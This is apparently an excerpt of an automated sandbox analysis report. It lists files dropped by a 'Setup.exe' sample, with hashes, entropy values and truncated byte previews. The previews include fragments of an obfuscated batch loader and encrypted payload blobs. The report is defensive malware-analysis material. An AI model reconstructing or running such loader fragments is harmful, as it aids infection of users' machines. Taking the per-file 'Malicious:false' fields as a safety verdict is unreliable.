                                                                                                                                                                      Preview:..7..Y..........h.|.K.....:.......Mo..O.U..ru..........I$..@.).......cMc)C....r..K.....^...\......Hh...f<...pr.{Q.~...ym..l......L^x.M. ..P..A.........V...._...e.B.<F..........N......omiq ..[........q. .B.U=m...?...paB..qi?f....[......wn...Z..db...5....gy..>@...c+.v..o.(......m*......>.....0\....A..(&...2.?.1....n...Pp...O.C.n*...7.<...Y).....rn.S...]|.(n.F.U.0<.).q.h.8.a....w.".v......D..`..|.(8_..S5.U..........-.Z...L.f.Ns.......?......].p..B.p.>}AWDR.Exw....T......3...Y<.T....K......d.?.......`<sI4...gi..PN.?2&...H.._fh..H....o.H..4>.$.<.Zjw.."\..%..I..H.N....s<j.....Fp..e.#Vj....&..m,.}.?....xr.H.........`.i.1Jj..8..~.I..?u)1..&..k.% .I.=..x...V..! ......ULf.W....db#v.m../ldz-..:...L....0......E.P.}f..........p...}.L..z.?B4{Rz.d...V...0..=..<..TH..>...F.Q}.........q....~:..N..l.t...Q..,..e..I|}..."]iP..{.W...84...o.........P.G`...y...;t....T.L(K..*...@.(..H\....`..Ga.6{1K..h.qT]F".*.....o....>...D.}...mUi4={....\..|....Pn'.
                                                                                                                                                                      Process:C:\Users\user\Desktop\Setup.exe
                                                                                                                                                                      File Type:ASCII text, with very long lines (980), with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):21933
                                                                                                                                                                      Entropy (8bit):5.098733008811691
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:384:hXaKFDtP0hMjSwgunj4RBQtvcy7KxRVIjGBnV2gR9XnNNCUZ0n+RL1ddXJtNiLYi:hXaUchMGKnyBQVBujIG9AgJjFHb+
                                                                                                                                                                      MD5:B72A397CD97E0F26EA645687E0E27B12
                                                                                                                                                                      SHA1:8BA44F76D5CDD59429FAE20D9386E1F62785AFBA
                                                                                                                                                                      SHA-256:5D3E41E290DC98B449E186D0A3E9EC9E02863DE087EC95B3684C399C7D4DB280
                                                                                                                                                                      SHA-512:938FD796A5F4109B2678CE8B7AB93330317A71AA1E69CF81DE1C759A659D8B0E080B94BFA2F9FEA24224E19DDC53C3C1BB3F7CCD9ED8C5323638BD29E1EDC074
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:Set Accessed=a..jDSDDaughters-Sc-Equipped-Stewart-..rXRestoration-Counties-Secured-Lucia-..iFTeddy-..lESuccessfully-Jordan-Justin-Clouds-..xYwSt-Moscow-Ou-..TdDiversity-Bookstore-Aid-Reasoning-Broadway-Consequences-Commissioners-..Set Momentum=2..XItBike-Subsidiaries-..KgcXAccessory-Scored-Message-Nuke-Guess-Figure-Necessarily-..NLlMight-Untitled-Mail-Programs-Charles-Tea-Myself-..rZActually-..DUeKYouth-Ieee-..vrAaInternationally-Temporal-Enjoy-Tiny-..kndFExpiration-Broadcasting-..xQSAcre-Recordings-Maternity-Switched-Soldiers-Injuries-Meets-..Set Doing=Z..wWCome-Strip-To-Clay-Rank-Mood-Licking-Dress-..jwQRequires-Genius-Studying-..ZZMATax-Solely-James-Putting-Hear-Irrigation-Strain-Collectible-..jDZones-Verizon-Costa-Valuable-Midlands-Calculations-..YDTechnical-Prophet-Involve-Recovered-Surveillance-Euro-Pix-..wlFears-Weekly-Barbados-..qoevCoin-Screensavers-Detailed-..NvHZSurveys-Keith-Louis-Disturbed-..Set Customize=I..FqFpCeremony-Brands-Conservative-Municipal-Ace-..tDUDuties-Papua-
                                                                                                                                                                      Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      File Type:ASCII text, with very long lines (980), with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):21933
                                                                                                                                                                      Entropy (8bit):5.098733008811691
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:384:hXaKFDtP0hMjSwgunj4RBQtvcy7KxRVIjGBnV2gR9XnNNCUZ0n+RL1ddXJtNiLYi:hXaUchMGKnyBQVBujIG9AgJjFHb+
                                                                                                                                                                      MD5:B72A397CD97E0F26EA645687E0E27B12
                                                                                                                                                                      SHA1:8BA44F76D5CDD59429FAE20D9386E1F62785AFBA
                                                                                                                                                                      SHA-256:5D3E41E290DC98B449E186D0A3E9EC9E02863DE087EC95B3684C399C7D4DB280
                                                                                                                                                                      SHA-512:938FD796A5F4109B2678CE8B7AB93330317A71AA1E69CF81DE1C759A659D8B0E080B94BFA2F9FEA24224E19DDC53C3C1BB3F7CCD9ED8C5323638BD29E1EDC074
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:Set Accessed=a..jDSDDaughters-Sc-Equipped-Stewart-..rXRestoration-Counties-Secured-Lucia-..iFTeddy-..lESuccessfully-Jordan-Justin-Clouds-..xYwSt-Moscow-Ou-..TdDiversity-Bookstore-Aid-Reasoning-Broadway-Consequences-Commissioners-..Set Momentum=2..XItBike-Subsidiaries-..KgcXAccessory-Scored-Message-Nuke-Guess-Figure-Necessarily-..NLlMight-Untitled-Mail-Programs-Charles-Tea-Myself-..rZActually-..DUeKYouth-Ieee-..vrAaInternationally-Temporal-Enjoy-Tiny-..kndFExpiration-Broadcasting-..xQSAcre-Recordings-Maternity-Switched-Soldiers-Injuries-Meets-..Set Doing=Z..wWCome-Strip-To-Clay-Rank-Mood-Licking-Dress-..jwQRequires-Genius-Studying-..ZZMATax-Solely-James-Putting-Hear-Irrigation-Strain-Collectible-..jDZones-Verizon-Costa-Valuable-Midlands-Calculations-..YDTechnical-Prophet-Involve-Recovered-Surveillance-Euro-Pix-..wlFears-Weekly-Barbados-..qoevCoin-Screensavers-Detailed-..NvHZSurveys-Keith-Louis-Disturbed-..Set Customize=I..FqFpCeremony-Brands-Conservative-Municipal-Ace-..tDUDuties-Papua-
                                                                                                                                                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):115712
                                                                                                                                                                      Entropy (8bit):6.395119066715225
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3072:0kjGWoUlJUPdgQa8Bp/LxyA3laW2UDQWf05mjccBiqXvpgh:0kjGgQaE/loUDtf0accB30
                                                                                                                                                                      MD5:C4852541FFA550317E284995D601BE19
                                                                                                                                                                      SHA1:295EE4490A566D441DEAB2DBBB7917E36C154984
                                                                                                                                                                      SHA-256:D31EEED38AC69015A7ACB915312B6FAEF3534641C61926F9CD4E5471C8921501
                                                                                                                                                                      SHA-512:4EF2060810F8A9886CFCACAC246CBFC5408B46C3E07460B7D27271F52E09ABFFB1304A00B57C85F17F3C1B980E8944272CE2AD0B7902B23949C8D68CBE94B8EB
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.w..3.........+%E...@...@..$E...@..%E.@%E.[%E..%E..%E.p%E.....U...4SV...E.....W.u..E.......m......d.....h....E......E...'>...{,..{..}....>...C......;>........>...O......'?...K,.....&@.....C ....U...E....U.M..E..E...;E....?..;....?...E...O......@...M.......K .U..E......Q.........$K.......?........@.............sC...K.......G.....#K................A...C..E..G.......B....9E.|).K..E.A...M....BC...E.....HC.._^[..].....m.......B....l....uv..h...._0..t..O ......O......j8W.X........h...2...m.....d...........w....$.<.@..K..B....]....8....].....A..P....t........*E...@..)E...@...@.>*E...@._.@.....U...TS.]..E.VWj.P.E..E.....P...E.....S.u..E......E..............D...M.U..U....ua..up2..E..E..E....~E............S..}....f.x.....G...8....G...D..G..@...f.....B....}..u _^[..]....A....w..$.0.@...t....3..E...I.3..E......M.u.f...tz..$..........x.;...X...j........K........f.N.f.K.f.N.f..?......f.....tE..f.. ..yE.......M.E.4..E..M.u.A.M.P....f.x..u..<.;...PE..j..v.....O.......f.N.f.O.f.
                                                                                                                                                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):119808
                                                                                                                                                                      Entropy (8bit):4.703941535706935
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:768:8x/SGKAGWRqA60dTcR4qYnGfAHE9AUsFxyLtVSQsbZgar3R/OWel3B:8dKaj6iTcPAsAhxjgarB/5el3B
                                                                                                                                                                      MD5:6AD6CD8E77D34C3079924FD65546554F
                                                                                                                                                                      SHA1:2E18F066D291DAF1FC92E65FCDA539082C96706B
                                                                                                                                                                      SHA-256:C4DE2122AAC5865C856E71D4ECD8C2D96A9CDD0D1C277AC4585193F7A836CF86
                                                                                                                                                                      SHA-512:A5E22E29C4B84F3E79CEB2B572E45266EC5CBCE440CEDE118508447B1B1EB74394BB90A1C8C8D27B587B1440CFBDB2F9319B375C63B90615450E282C13EA5F3F
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.r.=.=.=.=.r.r.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.r.=.=.=.=.r.r.=.=.=.=.=.=.=.r.=.r.=.=.=.=.r.r.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.r.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.r.=.=.=.=.r.r.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.r.r.>.>.>.?.?.?.?.?.?.?.?.?.@.@.@.@.@.@.@.@.@.@.@.@.@.@.@.@.@.@.@.@.r.r.r.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.A.A.A.A.A.A.A.A.A.A.r.r.r.r.r.r.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.r.r.r.r.r.r.r.r.r.r.r.C.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.
                                                                                                                                                                      Process:C:\Users\user\Desktop\Setup.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):84992
                                                                                                                                                                      Entropy (8bit):7.998038120662092
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:1536:sIA4cY4ZTD4Wdyt1SLu68D95GjAPjKocYPsj+R+VUBZfyzusHLyJ83wC8niH:/Zt4Okyt0YDrjJBPsaQaYLzt8niH
                                                                                                                                                                      MD5:20939DE37758844D50817F401E778A6E
                                                                                                                                                                      SHA1:57B1ADB6D7EFE4656D336C370B9A6836AD240047
                                                                                                                                                                      SHA-256:3767D43C25C3E65CC5181C73875F1506A68AC2CBE4F0332E0C471C4A3842FF2B
                                                                                                                                                                      SHA-512:9B3DB71D43B7C77C24C6AB59D205B18C9DA57105A9825F77C2865CE2F4A0EA92C1837B27A5D4AD6315BA92BA0FF995FA2BEB2ACDD4CD0A9B85C68EE362405F4D
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:n..$.,.V_x...1d.........4.t.,.b.<.....F.3"...Q@.5.d......$..5.|...+..g....(..(.].7K..{)].Y'@..p..,E[..:"\T..L...u9.....X5..t....@..F......._.A]=GZ...F!.....Rc\.c.o.h.........<x.b_S=.e5..+EZ#....m...'S.d.......K.8Q..W..;..........",.....z..w....p..$0..C.....RHu.T..L....~.a..dZ.dW.>}....5....]m\G.....k%n.=.k....;W[E....h}Z.<..,....H.?"~iD.O...?.<_m.N~..=o. '......H<.vv...e.|=E.....'i?a....e.I.t...pg.Q3.......4.....^6^h\.`.v........9......Tf..=K..iR..'.I$]N.....p.Y...;R...C^..r).@..ai:~..9JP.......F.c3..|.R%......Wo.Z....N.Y..:...L..X6@........N9...#..n.B.X....Y.....~.S... ..45.TL...?..."..n'..v.5.......T.*..Sl....._4..r,.C.....8..>4...m.......{...C.....i...8.Pi+8.A.\gQ:..'I.....B*.q....oL_r{....|....F7f.`.i&u.9......^zL..Y..)..9..>..P..Z01.............%.....J.{.Q..[.~R..xyK.({.m;..[.Dv..wE.;....3.<..5..+...qkN..p?...e...F.x..42^%$......R7W...>B.....S.z>..JL..p=-B.e.v..Ph.v.2zG....jb.5m.T..Os.....>q...........#..m....Q..T.c.+....2..c...q....>..8.}^
                                                                                                                                                                      Process:C:\Users\user\Desktop\Setup.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):81920
                                                                                                                                                                      Entropy (8bit):7.9975318296902085
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:1536:KQJudkxXNhePo/DCiyl7QMkDKLdS5omcsuXq5oPj2TtfGXQ1Yn:TJIklbePIDVI76KLdS5oJr2T9WQ1M
                                                                                                                                                                      MD5:4AB70FFED39BD5AC69154E19D58B0267
                                                                                                                                                                      SHA1:4222C1A9BA794033A285027DB648950B3ED5BB42
                                                                                                                                                                      SHA-256:37BAA43A816D6A60D68ABD4DEEDF84C6F3EE08FFC0BE271C9865A0CA1FF3977D
                                                                                                                                                                      SHA-512:2C596F996C103900F3ABAC713241E61CCB45EC0FDD3342805A8400BC3992EE60A38BB660B6E67DABF57BC2F335DCA6E0D02B333EC2852406780B6FADE1FAF61B
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.dK.. .lV(..&...`e.?..)H...tX..-1`.d._E.W...fS..g<..w.%.`m.$..a_v..B.4.Tt.#....g?...Iy......)....).Sg ........t.g.q\....h)....D......./wF).{...F....d.^`..B..N...E.wj,.z0.s..aW..|..P-).3V...:..mC.....7.z$Pn......]......>...\...`.....N...+IS...Q........9+g .J...[...sp,.'.{1.....DnW..3.xS......H.z...z...L*..^.P..E.$.6:.....]I..}:i.........wl..(q....^.7..T.7..Ta...Va......g|..........zu#?.N`.O....anX..".e.....+....j.DyJ-F.a...?.m.....v.d......e...@Yu..Y...9....,.a....U...g......:.^.....\c..M...}....SP.n..A4'6hE.r.;9.>Y......5?..];i...\.6.....U......1....s.$..&../k..@e/..f.....l.,.x.[@<.H[..e.i%.O...Y&.mC...5$T]....p.h/6tfk.p...7.B[.[.......t..j.w...Rt{:&MTs..=t...-..YQ+S.(......:.!....z..C..1.@.p..@.sX.......A...../. ..n......Y.\..c..<..^.5.....K...[..?.D>.V...u....f.../..%......iq...W-,z......:.1.U...K..ro..5^..e..C..x..:.[8.U..$.....L....f.e.....<O?..rq.....4^..$......P....8.}.T.Z)...*2.u.,..J...S.1<....*u..{vp..qw.7.`]...c..h.'..
                                                                                                                                                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):11606
                                                                                                                                                                      Entropy (8bit):7.4586390538525755
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:/sxvhLuBgfMvSVZPkZeCeAH6N8VEVFJ84kcGNq4/C+Q3ISVSWMZMQ3rw:/GhLdXVaeCVrVEVFJ8ZcGwGBk7/UMQ38
                                                                                                                                                                      MD5:7A4CC8156B3C6C90F7D85BCD734AFE1F
                                                                                                                                                                      SHA1:60D593ADB9C1CC411A5AFC2B16479B75677162E9
                                                                                                                                                                      SHA-256:2D6B7033E50813D756FFDD4AD36C8DF1017A9A70FC09483E8973B7929BE0DE8E
                                                                                                                                                                      SHA-512:9F4A21993B88F883FA311B545BE8565939CD008045E764F4C2A44EF1883152BCE8C7F3EADCAB530650003C5693268D48D73FA48EF6B63B8CA90F5DE7C143DCDE
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:8>@>H>P>X>`>h>p>x>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.?.?.?.? ?(?0?8?@?H?P?X?........$3@3D3.3.3.3. .......0(0.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.2.2.2.2.2.2.2.2 2$2(2,2024282<2@2D2H2L2P2T2X2\2`2d2h2l2p2t2x2|2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.3.3.3.3.3.3.3.3 3$3(3,3034383@3D3H3L3P3T3X3\3`3d3h3l3p3t3x3|3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.9.9.9.9.9.9.9.9.9.9.9.9.:.:.:.:.:.:.:.: :$:(:,:0:4:8:<:@:D:H:L:P:T:X:\:`:d:h:l:p:t:x:|:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.;.;.;.;.;.;.;.; ;$;(;,;0;4;8;<;@;D;H;L;P;.<.<...@.......3.3.3.3.3.3.4.4.4,4<4@4P4T4X4`4x4.4.4.4.4.4.4.4.4.4.4.4.4.4.5 5$54585<5D5\5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.6.:.:.:.: :$:0:4:8:<:D:L:\:`:h:l:p:t:|:.:.:.:...`.......=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.>.>.>.>.>.>.>.> >$>(>,>0>4>8><>@>D>H>L>P>T>X>\>`>d>h>l>p>t>x>|>.>.>.>.>.>.>.>.>.>.>.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?...p..x....0.0.0.0.0(0,0004080<0
                                                                                                                                                                      Process:C:\Users\user\Desktop\Setup.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):56320
                                                                                                                                                                      Entropy (8bit):7.996391191024259
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:1536:9y+X35Zzw/OxuLxNqF9vtOEmH3fcoQZ/SDfNuz6RgBStp46V:9y+n5KGxuL89vcPZdDIW6BSjd
                                                                                                                                                                      MD5:67EBFD624465856B781C2F15624B5FBB
                                                                                                                                                                      SHA1:6B80BBBDBA9B6F3B587F6C84B81E509761C31C08
                                                                                                                                                                      SHA-256:2EF775B484665CA2D846E398C6C65CDDFDD66E3AC0CF37B5D51780F7A913934B
                                                                                                                                                                      SHA-512:0F392C2B778DB3F688BA0ADF2A37AA91470767A50D7E9A602600B602535B39B1FE02E865404A20363B1753BB55D5718582A69F759950B99A10F111A8795A930A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:..igIm...y(y........e...|...'...w.......9b.a....y.7.F...-.J.B....o...NVQ.xb._r#....wU...H>s...r......z......*.....wH...P{..=.o...q....={.....}....9sW<4hOJ.KK..1E.....@$.......%@....q........:X~...^......3<.i9...V....F....;.A[S'I+..... WW.I.R%8...p..yU..!....Uq...D.W.[G..v:...|.3...L.y^.H.v2....y..l..........m.^_...\N/....zy..{g?G...k.......H}f..q9R.I.^C.B....N.<..o.w.^wq\.j..../j...M..u.....9/.g?.R\e..Z..:.'.uI.].d..2.......&.M.. 0.O.{..........K.cT..o...].uz..=a.B@..C.}.T_.6..5+V.d..._.<.'.Ua...,d.......g[.....N.....XQ..O..8 ..6.Ce.4&....@)..3.]..*y.)X).....t...(<q#.w..X.`...wM.N.P.0{U.WnYu+..X....a.{[.....}...i.#PG..g........1..E..(.\`3_n.S2.eT&.........#.X......]`9/...YN.W.8.RH.K."..`..O.c....W@g..U.....!g.D.v?E.)..*.|.J.D..Y>.F.=..(.(".zo....R....<.C..f..E..v...R....`FG5"...x.(..$...[..%..a./.W...4z.?)z.\.TW&..@.[.w.W......94torJ..$....<.c.t.4.e?.v.n.&.....jt2..kr.`..Tn..H.....y......1..?.Y1.6.,T.z.l.D.C./.lC7...A9..e.x...m.Vg...@>jT....8r..
                                                                                                                                                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):79872
                                                                                                                                                                      Entropy (8bit):6.667903538113778
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:1536:SYrDWyu0uZo2+9BGmdATGODv7xvTphAiPChgB:1Wy4ZNoGmROL7F1G7hg
                                                                                                                                                                      MD5:A7DD562FCE7652FB965799C55254A0BA
                                                                                                                                                                      SHA1:CC4D96CC2BA4CE3BA53BAB6E9EAE0FCAD590C9C7
                                                                                                                                                                      SHA-256:0C186D145F698364C95675C82600446E24DC25E2BD7DB0520733C67781EAC0B3
                                                                                                                                                                      SHA-512:FC982815B5F73E5A145C0BD89C22E404A29C510D74714A66D0FF9C2AD1A516D426BD3FF2166A5C1336571827C4CC665311C591F227E2BB9E85FCB1E95F914785
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:a.r.i.a.b.l.e.s. .a.l.l.o.w.e.d. .i.n. .a. .".W.i.t.h.". .s.t.a.t.e.m.e.n.t...v.".l.o.n.g._.p.t.r.".,. .".i.n.t._.p.t.r.". .a.n.d. .".s.h.o.r.t._.p.t.r.". .D.l.l.C.a.l.l.(.). .t.y.p.e.s. .h.a.v.e. .b.e.e.n. .d.e.p.r.e.c.a.t.e.d... . .U.s.e. .".l.o.n.g.*.".,. .".i.n.t.*.". .a.n.d. .".s.h.o.r.t.*.". .i.n.s.t.e.a.d...-.O.b.j.e.c.t. .r.e.f.e.r.e.n.c.e.d. .o.u.t.s.i.d.e. .a. .".W.i.t.h.". .s.t.a.t.e.m.e.n.t...).N.e.s.t.e.d. .".W.i.t.h.". .s.t.a.t.e.m.e.n.t.s. .a.r.e. .n.o.t. .a.l.l.o.w.e.d...".V.a.r.i.a.b.l.e. .m.u.s.t. .b.e. .o.f. .t.y.p.e. .".O.b.j.e.c.t."...1.T.h.e. .r.e.q.u.e.s.t.e.d. .a.c.t.i.o.n. .w.i.t.h. .t.h.i.s. .o.b.j.e.c.t. .h.a.s. .f.a.i.l.e.d...8.V.a.r.i.a.b.l.e. .a.p.p.e.a.r.s. .m.o.r.e. .t.h.a.n. .o.n.c.e. .i.n. .f.u.n.c.t.i.o.n. .d.e.c.l.a.r.a.t.i.o.n...2.R.e.D.i.m. .a.r.r.a.y. .c.a.n. .n.o.t. .b.e. .i.n.i.t.i.a.l.i.z.e.d. .i.n. .t.h.i.s. .m.a.n.n.e.r...1.A.n. .a.r.r.a.y. .v.a.r.i.a.b.l.e. .c.a.n. .n.o.t. .b.e. .u.s.e.d. .i.n. .t.h.i.s. .m.a.n.n.e.r.....C.a.n. .n.o.t. .r.e.
                                                                                                                                                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):55296
                                                                                                                                                                      Entropy (8bit):6.548215294045205
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:768:JQ18OWrM81EyJqx9EdzGGXZVfmlqTmN5WAQIGK2ud5lS87uzh7JCQ/sE7mOB6XSB:m1/AD1EsdzVXnP94SGGLpRB6M20
                                                                                                                                                                      MD5:EF4E81CB8052EE9B5A6FC6DCD7567548
                                                                                                                                                                      SHA1:B919759461FD777C96B4F322F408812009B40C00
                                                                                                                                                                      SHA-256:B02877F89D3F3E8327DB1964DAE27C0E7C5087527BA650066C1BD6C6E4A4F715
                                                                                                                                                                      SHA-512:067B2BB15104B685E243EE08177C94625F55713FAD6D2264088650B889B0208448DC428ACC5EED0056D959686D338396AAF18D23EFD2C7C07203FDBBA1EDCBBC
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:...............................................................................................................................................................................................................................................................t.M.....hi'D......Y.hs'D......Y..r...hx'D......Y..|X..h}'D......Y.Q.I...h.'D.....Y.0$M.Q.@..0$M.P.=B..h.'D.....Y...C..h.'D.....Y.....h.'D..}...Y..+O..h.'D..l...Y..!...h.'D..[...Y.45M....h.'D..E...Y.U....SVW.}.....e....E..E..w..E..E.E.E............v..G..H..z....E....v..G..H..g....E....v..O..I..T....E...v..O..I..A....E...v..O..I.......E...v..O..I.......E..O..1...?}...u..N..u..u..u..u..u..u..1........p.....u.........F.....3._..^[....U..V.u.3.W.~....p....N.j.j.P..j.j....Pj......u..........>3._.F.....^]...SV..3.Wj._.N...N(...^..^..~..^..^..^ .^$.4......f.^8.Nl.F:..^<.^@.FL.FP.FT.FX.F\.F`.Fd.....j....................F|U............[............u......3........................l.....p.....t.....x.....|...............
                                                                                                                                                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                      File Type:DIY-Thermocam raw data (Lepton 3.x), scale 0-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset -9444732965739290427392.000000, slope 2734396502252404170448376371133546496.000000
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60416
                                                                                                                                                                      Entropy (8bit):6.067319379992331
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:768:50vq6LqgaHbdMNkNDUzSLKPDvFQC7Vkr5M4INduPbOU7aI4kCD9vmPukxhSaAwun:50vtmgMbFuz08QuklMBNIimuzaAwusq
                                                                                                                                                                      MD5:7E9F33DC7CC9891C8CA419EBC7B31AAA
                                                                                                                                                                      SHA1:DA6037F59597399A96A8E756D819CD0E2E104A4A
                                                                                                                                                                      SHA-256:5C5491AC3971BFA44F13F9719F011A7B1B353BC4127ECF7195A74513345EB7BB
                                                                                                                                                                      SHA-512:8BAD109A56DC7C0B03B0848C962FE60DD878EE9209D2FDE90E1429EF77D3B58E0A03CA795805EBE08CED195AE45AB895BB68AD952BF1ED9595C33AEC0C71E8E5
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:u.z.-.e.c.....q.u.z.-.p.e.....r.o.-.r.o...r.u.-.r.u...s.a.-.i.n...s.e.-.f.i...s.e.-.n.o...s.e.-.s.e...s.k.-.s.k...s.l.-.s.i...s.m.a.-.n.o.....s.m.a.-.s.e.....s.m.j.-.n.o.....s.m.j.-.s.e.....s.m.n.-.f.i.....s.m.s.-.f.i.....s.q.-.a.l...s.r.-.b.a.-.c.y.r.l.....s.r.-.b.a.-.l.a.t.n.....s.r.-.s.p.-.c.y.r.l.....s.r.-.s.p.-.l.a.t.n.....s.v.-.f.i...s.v.-.s.e...s.w.-.k.e...s.y.r.-.s.y.....t.a.-.i.n...t.e.-.i.n...t.h.-.t.h...t.n.-.z.a...t.r.-.t.r...t.t.-.r.u...u.k.-.u.a...u.r.-.p.k...u.z.-.u.z.-.c.y.r.l.....u.z.-.u.z.-.l.a.t.n.....v.i.-.v.n...x.h.-.z.a...z.h.-.c.h.s.....z.h.-.c.h.t.....z.h.-.c.n...z.h.-.h.k...z.h.-.m.o...z.h.-.s.g...z.h.-.t.w...z.u.-.z.a...0...1#INF...1#QNAN..1#SNAN..1#IND..............?.......?.......?.....D.?.......?.......?....@..?....@W.?.......?.......?.......?.....w.?.....A.?.......?....@..?.......?.....q.?.....?.?.......?....@..?.......?.....}.?.....N.?....@ .?.......?.......?.......?.....m.?.....A.?.......?.......?.......?.......?.....q.?.....H.?.....!.?.......?.......?..
                                                                                                                                                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):777
                                                                                                                                                                      Entropy (8bit):3.9586418744428995
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:pyGSG+fCtJfjEvadTfA43k66h1ICdC3v6clC1:pyGS9PvCA433C+sCNC1
                                                                                                                                                                      MD5:906017194573324C7F663EC0C29DD8E6
                                                                                                                                                                      SHA1:05F6873387E6DAA4ED362B5C1AE4778C0DDFAC11
                                                                                                                                                                      SHA-256:A53D274AB9542F5FFC54F3C3F556A24F6908AA19012B28537BD3FBB2687BE9A5
                                                                                                                                                                      SHA-512:9FDFAC75BE2374037D7E6548EB48700583153C6A8E8B194D82C5FEF71769073B30B955BA142B21C272A9B00456FBD88D4BC455C2890B56AF8A07EC6740387D29
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:Travels........................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B..........................................
                                                                                                                                                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):87040
                                                                                                                                                                      Entropy (8bit):6.574129972694159
                                                                                                                                                                      Encrypted:false
